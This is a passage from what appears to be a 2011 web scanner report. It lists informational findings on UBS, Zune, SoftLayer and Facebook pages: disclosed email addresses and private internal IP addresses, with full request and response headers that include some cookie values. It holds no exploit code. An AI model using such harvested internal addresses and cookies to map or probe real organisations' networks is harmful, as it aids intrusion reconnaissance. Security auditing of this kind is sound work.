Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 20444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.28. http://www.softlayer.com/virtualization/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /virtualization/

Issue detail

The following email address was disclosed in the response:

Request

GET /virtualization/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 22859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.29. http://www.ubs.com/1/e/index/phishing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/e/index/phishing.html

Issue detail

The following email address was disclosed in the response:

Request

GET /1/e/index/phishing.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:58 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 21773
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 0
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
<a href="mailto:internetsecurity@ubs.com" target="_top">internetsecurity@ubs.com<!--Force all XSLT engines to generate an end tag.-->
...[SNIP]...
16.30. http://www.ubs.com/1/e/online/legal/data_source.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/e/online/legal/data_source.html

Issue detail

The following email address was disclosed in the response:

Request

GET /1/e/online/legal/data_source.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:01:13 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 111113
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 33
WipExpirationDate: July 6, 2011 16:16
Expires: Wed, 06 Jul 2011 14:16:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
ewsgroups, mail lists, electronic bulletin boards, or other services, without the prior written consent of Dow Jones or AWP. To request consent for this and other matters, you may contact Dow Jones at djnewswires@dowjones.com or AWP at verkauf@awp.ch.<br/>
...[SNIP]...
16.31. http://www.ubs.com/1/live/homepage/shared/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/shared/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1/live/homepage/shared/jquery.cookie.js HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:02 GMT
Server: Apache
Last-Modified: Thu, 17 Jun 2010 12:11:34 GMT
Cache-Control: max-age=1880
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 4341

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
16.32. http://www.zune.net/en-US/press/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/press/default.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /en-US/press/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S503
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 33125


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a href="mailto:zunepress@edelman.com">zunepress@edelman.com</a>
...[SNIP]...
16.33. http://www.zune.net/en-us/newsletter/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/newsletter/default.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /en-us/newsletter/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 28717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a href="mailto:zune@e-mail.zune.net">zune@e-mail.zune.net</a>
...[SNIP]...
17. Private IP addresses disclosed  previous  next
There are 18 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

17.1. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.198
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1646
Expires: Wed, 06 Jul 2011 11:47:57 GMT
Date: Wed, 06 Jul 2011 11:20:31 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
17.2. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.64.186
Cache-Control: public, max-age=253
Expires: Wed, 06 Jul 2011 14:11:00 GMT
Date: Wed, 06 Jul 2011 14:06:47 GMT
Content-Length: 2338
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
17.3. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/DhINBSBsTFQ.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y4/r/DhINBSBsTFQ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y4/r/DhINBSBsTFQ.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 01 Jul 2011 19:32:31 GMT
X-FB-Server: 10.138.69.184
Content-Length: 38947
Vary: Accept-Encoding
Cache-Control: public, max-age=31140498
Expires: Sat, 30 Jun 2012 21:26:53 GMT
Date: Wed, 06 Jul 2011 11:18:35 GMT
Connection: close

/*1309555663,176833976*/

body{background:#fff;font-size: 11px;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;color:#333;margin:0;padding:0;text-align:left;direction:ltr;unicode-bidi:embe
...[SNIP]...
17.4. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.213.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Length: 11639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
17.5. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.45.44
Connection: close
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Length: 22

Invalid Application ID
17.6. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105884726134656&app_id=105884726134656&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df313020f9c%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df143104ab8%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24aa56e24%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fffad37%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c7a69384%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.226.45
X-Cnection: close
Date: Wed, 06 Jul 2011 11:22:08 GMT
Content-Length: 236

<script type="text/javascript">
parent.postMessage("cb=f1fffad37&origin=http\u00253A\u00252F\u00252Fwww.bebo.com\u00252Ff2847a9e74&relation=parent&transport=postmessage&frame=f2035863b4", "http:\/\/ww
...[SNIP]...
17.7. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.246.30
X-Cnection: close
Date: Wed, 06 Jul 2011 11:20:28 GMT
Content-Length: 5867

<!doctype html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8"><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" h
...[SNIP]...
17.8. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.139.39
Connection: close
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Length: 6071

<!doctype html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8"><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" h
...[SNIP]...
17.9. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php?u=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.137.49
X-Cnection: close
Date: Wed, 06 Jul 2011 11:16:07 GMT
Content-Length: 0

17.10. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.56.25
Connection: close
Date: Wed, 06 Jul 2011 14:07:34 GMT
Content-Length: 0

17.11. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php?u= HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php?u
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.226.65
Connection: close
Date: Wed, 06 Jul 2011 11:21:53 GMT
Content-Length: 0

17.12. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.252.30
Connection: close
Date: Wed, 06 Jul 2011 11:21:53 GMT
Content-Length: 0

17.13. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php?u=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&t=presspass+controls+-+Microsoft+Search HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Fsearch.microsoft.com%2Fresults.aspx%3Fq%3Dpresspass+controls%26FORM%3DMSERRO%26mkt%3Den-US&t=presspass+controls+-+Microsoft+Search
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.254.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:53 GMT
Content-Length: 0

17.14. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php?u=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.161.62
X-Cnection: close
Date: Wed, 06 Jul 2011 11:17:16 GMT
Content-Length: 0

17.15. http://www.facebook.com/sharer/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer/sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fsharer%2Fsharer.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.124.39
Connection: close
Date: Wed, 06 Jul 2011 14:07:34 GMT
Content-Length: 0

17.16. http://www.facebook.com/sharer/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
